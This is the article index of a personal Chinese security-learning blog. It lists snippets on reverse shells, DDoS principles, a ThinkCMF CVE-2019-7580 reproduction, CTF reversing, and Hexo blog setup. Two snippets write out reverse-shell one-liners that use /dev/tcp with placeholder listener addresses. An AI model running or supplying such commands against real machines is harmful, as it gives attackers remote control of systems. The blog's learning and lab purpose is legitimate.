wjl110

分类

GitHub(2) vulfocus漏洞复现(2) Wordpress(2) 博客(2) 学习笔记(8) 未归档(1) 渗透笔记(6) 笔记(3)

/ 注册

一位有品位的信息安全开发者~

全部文章（共26篇）

反弹shell命令学习笔记(命令在Mac里执行,反弹到kali机)sudo su 后连接必反弹

反弹shell命令(命令在Mac里执行,反弹到kali机)sudo su 后连接必反弹搭了个技术博客,点我传送 Mac端监听命令没有nc -lvp port 只有 nc -lv (或-lvv) port Mac➡️kali : sudo su zsh -i > /dev/tcp/监听...

2022-04-22

0 347

MarkDown语法学习教程,2分钟学会速写个人GitHub,轻量化,快捷,迅速,方便.

Markdown 语法：使用 GitHub Flavored Markdown 语法，简称 GFM 语法。支持表格、TOC、LaTeX、代码块、任务列表、脚注等。画图库支持 mermaid, viz, ECharts, PlantUML, Sequence, Flow。 Mark...

2022-04-22

0 435

网安学习路线,最详细没有之一、看了这么多分享网安学习路线的一个详细的都没有~~

这是一个关于我的故事 1.、如果你也喜欢搭建个人博客可看我写的[这篇]文章 2、搭了个技术博客,点我传送这一切都要从21年10月第一次接触网络端口扫描工具nmap说起: 那天想看家里人用了哪些端口,Mac命令行brew安装了一个端口扫描工具“nmap”,从此,遨游网络的故事就开始了...

2022-04-22

0 786

Mac/Linux平台命令行的大部分问题解决办法.包括:切换编译环境、mysql启动命令、查看mysql位置、Apache服务启动、,php(oracle)的安装设置环境变量,zsh:权限不够解决办法

切换到anaconda的大环境使用python 把wjl更换为你的用户名即可 . /Users/wjl/opt/anaconda3/bin/activate && conda activate /Users/wjl/opt/anaconda3; 切换pip 2....

2022-04-22

0 576

HEXO+GitHub+DNS配置个人博客实战指南,手把手教你搭建个人博客,自己建站

HEXO+GitHub个人博客实战指南先看看成果吧⬇️ 网站效果传送带https://wjl110.xyz 测试命令本地测试: cd Desktop/xxx.com hexo cl & hexo g & hexo -p(端口) 54321 server 发...

2022-04-22

0 420

ddos(分布式拒绝服务攻击)分为两种直接攻击/**反弹攻击(间接攻击)ddos及对抗方法ip溯源的实现原理和防御措施

ddos(分布式拒绝服务攻击)分为两种直接攻击/反弹攻击(间接攻击) ddos的实现原理是基于tcp/ip的三次握手实现的攻击者将发送ip设置为虚假ip,受访者在进行第二次握手时,不能判断ip真伪,向源地址发送响应包,并且等待第三次握手,随时间响应丢失,却占用cpu和内存直接攻击(控制肉...

2022-04-22

0 395

[博客搭建]个人博客GitHub page+ hexo 优化+配置+页面布局

wjl110.xyz 可以体验一下正文开始: https://vercel.com 进入注册登录即可新建项目导入你需要配置的项目: 项目导入后第一栏填项目的名字:xxx 第二栏填构建项目的框架 ps:如果是静态hexo就选other 第四栏选择网站...

2022-04-22

0 436

【学习笔记】反弹shell命令学习笔记,实战指南,1v1攻击测试教学,常用的反弹shell命令: bash -i ＞& /dev/tcp/vps的ip/vps的端口 0＞&1

文章目录前言为何给靶机发送这条执行命令就会自动连接到本地计算机,并且出发实时通讯机制(ps:有点类似oicq,前生就是用的这种模式开发的即时通讯) 作为渗透测试人员必备技能,反弹shell到底是什么原理,以及如何使用,本文是自己学习shell命令时的个人感悟和笔记,文章内容大量引入了较为官...

2022-04-22

0 607

[vulfocus漏洞复现]thinkcmf 代码执行漏洞复现（CVE-2019-7580）phpinfo()；ThinkCMF是一款支持Swoole的开源内容管理框架(CMF),基于ThinkPH

前言 ThinkCMF是一款支持Swoole的开源内容管理框架(CMF),基于ThinkPHP开发. thinkcmf5.0.19 这个版本后台提供路由自定义，其中路由的别名对单引号缺少过滤，导致引发漏洞。文章也会在这里同步 0x01进入后台进入后台路径为:http://ip:p...

2022-04-22

0 752

逆向工程师逆向还原APP和代码，国产化就是这样

二进制逆向：将获得的代码解包，用二进制软件打开 ### 发现是用python代码写的程序，用解包程序反编译 ### 用vscode自带的hex进行逆向解码 ### 解开就得到了.pyc文件### 将反编译的.py文件里的代码逆向还原为flag即可获取到flag 写作耗时20分钟

2022-04-22

0 465